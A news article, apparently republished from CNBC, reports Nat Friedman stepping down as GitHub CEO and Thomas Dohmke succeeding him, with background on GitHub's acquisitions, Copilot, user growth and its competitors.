From left, GitHub CEO Chris Wanstrath, Microsoft CEO Satya Nadella and future GitHub CEO Nat Friedman at GitHub headquarters in San Francisco.

Source: Microsoft

Microsoft said Wednesday that Nat Friedman, CEO of the company's GitHub subsidiary that provides software for storing source code, is stepping down. Thomas Dohmke, GitHub's product chief will replace him.

The announcement comes weeks after one of GitHub's most prominent competitors, GitLab, went public on the Nasdaq. Following the debut, GitLab was worth $16.5 billion, more than two times what Microsoft paid for GitHub in 2018.

"As Chief Product Officer, I'm proud of the work our teams have done to bring new capabilities to GitHub Codespaces, Issues, Copilot, and many of the 20,000 improvements that we shipped last year," Dohmke wrote in a blog post. "Together, we've built a roadmap that will transform the developer experience for open source maintainers and enterprises using GitHub for years to come."

Dohmke takes over for Friedman on Nov. 15.

Friedman is "very excited to go back to my startup roots to support and invest in the builders who are creating the world of tomorrow," he wrote in a tweet. He will be an advisor to both GitHub and Microsoft, Scott Guthrie, executive vice president for Microsoft's cloud and artificial intelligence group, wrote in an email to employees.

Before becoming the top leader of GitHub, Friedman had been co-founder and CEO of Xamarin, a start-up that built cross-platform mobile development tools. Microsoft acquired Xamarin in 2016 and made Friedman a corporate vice president for developer services. Then in 2018, after Microsoft closed the GitHub acquisition, it tapped Friedman to run the subsidiary. His appointment came months after co-founder Chris Wanstrath stepped down as CEO.

Dohmke first registered as a GitHub user in 2009, not long after its founding in 2008. He was co-founder and CEO of app-testing software start-up HockeyApp, which Microsoft acquired in 2014. He moved to GitHub at the time Microsoft closed the GitHub acquisition in 2018.

Dohmke "led the GitHub acquisition process on the Microsoft engineering side from the deal signing to the successful acquisition close," Guthrie wrote in his email. Dohmke later led the acquisitions of Npm, a code-distribution start-up, and Semmle, a start-up whose software helps organizations analyze code to uncover security issues, Guthrie wrote.

Since the acquisition, Friedman has reported to Guthrie. Once Dohmke takes the helm at GitHub, he will report to Julia Liuson, a 29-year Microsoft veteran who is becoming president of Microsoft's developer division.

In the Friedman years, GitHub came out with new features and enhanced existing ones. Perhaps the largest announcement was the introduction in June of GitHub Copilot, a system that draws on code posted online to suggest new code for developers to add to their projects. The feature remains available to a limited number of users, and people often show off its abilities on social media.

Microsoft does not disclose GitHub revenue, but the company does occasionally provide updates on the size of the service's user base. Over 73 million developers were using GitHub today, up from 28 million when Microsoft announced its plan to buy GitHub.

GitHub's challengers have gotten bigger, too. In 2019 Atlassian said its Bitbucket Cloud service had reached 10 million registered users. And GitLab, which said in the prospectus for its initial public offering that its "principal competitor is Microsoft Corporation following their acquisition of GitHub," estimates that it has 30 million registered users. GitLab said revenue grew 69% year over year in the quarter that ended July 31.

WATCH: The rise of open-source software

See more here:

Microsofts GitHub CEO Nat Friedman is stepping down, product chief Thomas Dohmke will replace him - CNBC